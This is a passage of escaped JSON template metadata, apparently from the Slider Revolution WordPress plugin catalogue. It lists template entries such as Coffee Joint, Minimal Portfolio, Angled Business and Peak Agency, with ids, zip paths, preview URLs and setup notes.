target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"275\":{\"id\":\"293\",\"title\":\"Coffee Footer\",\"alias\":\"coffee-footer\",\"zip\":\"packs\\/coffee-footer.zip\",\"uid\":\"6027c25e87a5fe7fd8727a51c0967915\",\"img\":\"coffee-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"276\":{\"id\":\"294\",\"title\":\"Minimal Portfolio Website\",\"alias\":\"minimal-portfolio-website\",\"zip\":\"\",\"uid\":\"minimal-portfolio-website\",\"img\":\"packages\\/minimal_portfolio_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-portfolio-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-portfolio-website-template\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Minimal Portfolio template is a slide based website with additional modal detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Portfolio\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"19\",\"installed\":false},\"277\":{\"id\":\"295\",\"title\":\"Minimal Portfolio\",\"alias\":\"minimal-portfolio\",\"zip\":\"packs\\/minimal-portfolio.zip\",\"uid\":\"183b97b301d5ff0b171c067a87c8a3f5\",\"img\":\"minimal-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-portfolio-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-portfolio-website-template\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Minimal Portfolio template is a slide based website with additional modal detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Portfolio\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"19\",\"installed\":false},\"278\":{\"id\":\"296\",\"title\":\"Minimal Portfolio Modal\",\"alias\":\"minimal-portfolio-modal\",\"zip\":\"packs\\/minimal-portfolio-modal.zip\",\"uid\":\"6874e6cec3663670f209a8d8a4f26b16\",\"img\":\"minimal-portfolio-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/minimal-portfolio-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=minimal-portfolio-website-template\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Minimal Portfolio template is a slide based website with additional modal detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Minimal Portfolio\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"19\",\"installed\":false},\"279\":{\"id\":\"297\",\"title\":\"Angled Business Website\",\"alias\":\"angled-business-website\",\"zip\":\"\",\"uid\":\"angled-business-website-package\",\"img\":\"packages\\/angled_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"280\":{\"id\":\"298\",\"title\":\"Angled Menu\",\"alias\":\"angled-menu\",\"zip\":\"packs\\/angled-menu.zip\",\"uid\":\"2fe0c4682d1231ee3918be9e4fcb1837\",\"img\":\"angled-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"281\":{\"id\":\"299\",\"title\":\"Angled Header\",\"alias\":\"angled-header\",\"zip\":\"packs\\/angled-header.zip\",\"uid\":\"09462601d4edca8dff899de6f666dc47\",\"img\":\"angled-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"282\":{\"id\":\"300\",\"title\":\"Angled News\",\"alias\":\"angled-news\",\"zip\":\"packs\\/angled-news.zip\",\"uid\":\"b315105763ed91214cb2f0ac12615729\",\"img\":\"angled-news\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"283\":{\"id\":\"301\",\"title\":\"Angled Services\",\"alias\":\"angled-services\",\"zip\":\"packs\\/angled-services.zip\",\"uid\":\"7605651c1487e1a6c32edc70017be8ad\",\"img\":\"angled-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"284\":{\"id\":\"302\",\"title\":\"Angled Success\",\"alias\":\"angled-success\",\"zip\":\"packs\\/angled-success.zip\",\"uid\":\"9e3fa974a42ecf80e1ec6ff991fca430\",\"img\":\"angled-success\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"285\":{\"id\":\"303\",\"title\":\"Angled Footer\",\"alias\":\"angled-footer\",\"zip\":\"packs\\/angled-footer.zip\",\"uid\":\"aed4eaa2f7883351ba9c9947feef153e\",\"img\":\"angled-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"286\":{\"id\":\"304\",\"title\":\"Angled Content Modal\",\"alias\":\"angled-content-modal\",\"zip\":\"packs\\/angled-content-modal.zip\",\"uid\":\"4ddc74515fdf84f974217e4ed47a7c66\",\"img\":\"angled-content-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/angled-business-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=angled-business-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Angled Business\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"20\",\"installed\":false},\"287\":{\"id\":\"312\",\"title\":\"Retouch Before and After\",\"alias\":\"Retouch\",\"zip\":\"Retouch.zip\",\"uid\":\"58894991f1abd8b448c8d353b1b5fe76\",\"img\":\"Retouch\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/retouch-before-after-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=retouch-before-after-slider\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Retouch Slider is the perfect way to compare your photos before and after retouching.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"288\":{\"id\":\"313\",\"title\":\"Tech Slider\",\"alias\":\"tech-slider\",\"zip\":\"tech-slider.zip\",\"uid\":\"a98e2b264f00a1116d21808c6a543162\",\"img\":\"tech-slider\\/slide1.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/tech-showcase-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=tech-showcase-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This classic slider module with sleek device mockups features a smooth parallax effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"289\":{\"id\":\"314\",\"title\":\"Peak Agency Website\",\"alias\":\"peak-agency-website\",\"zip\":\"\",\"uid\":\"peak-agency-website-package\",\"img\":\"packages\\/peak_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/peak-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=peak-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Peak Agency Website template is a minimal, light one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Peak Agency\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"22\",\"installed\":false},\"290\":{\"id\":\"315\",\"title\":\"Peak Header\",\"alias\":\"peak-header\",\"zip\":\"packs\\/peak-header.zip\",\"uid\":\"b721bd612e9fbc5182418ad3fd7d0808\",\"img\":\"peak-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/peak-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=peak-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Peak Agency Website template is a minimal, light one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Peak Agency\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"22\",\"installed\":false},\"291\":{\"id\":\"316\",\"title\":\"Peak About\",\"alias\":\"peak-about\",\"zip\":\"packs\\/peak-about.zip\",\"uid\":\"7e68b1012fb03490d45c7f79e8cb1b19\",\"img\":\"peak-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/peak-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=peak-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Peak Agency Website template is a minimal, light one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Peak Agency\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"22\",\"installed\":false},\"292\":{\"id\":\"317\",\"title\":\"Peak Portfolio\",\"alias\":\"peak-portfolio\",\"zip\":\"packs\\/peak-portfolio.zip\",\"uid\":\"6198d1885ba9e95221c33e404f21bdbc\",\"img\":\"peak-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/peak-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=peak-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Peak Agency Website template is a minimal, light one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Peak Agency\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"22\",\"installed\":false},\"293\":{\"id\":\"318\",\"title\":\"Peak Footer\",\"alias\":\"peak-footer\",\"zip\":\"packs\\/peak-footer.zip\",\"uid\":\"2dead6897ad3b3a709b380d81242f76b\",\"img\":\"peak-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/peak-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=peak-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Peak Agency Website template is a minimal, light one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Peak Agency\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"22\",\"installed\":false},\"295\":{\"id\":\"320\",\"title\":\"Portfolio Welcome\",\"alias\":\"portfolio-welcome\",\"zip\":\"packs\\/portfolio-welcome.zip\",\"uid\":\"97336b8785e4a7b27facaf1547e0464d\",\"img\":\"portfolio-welcome\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/modern-portfolio-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-website\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A modern portfolio template with fancy scroll animations and a colorful design.<\\/span>\\r\\n<span 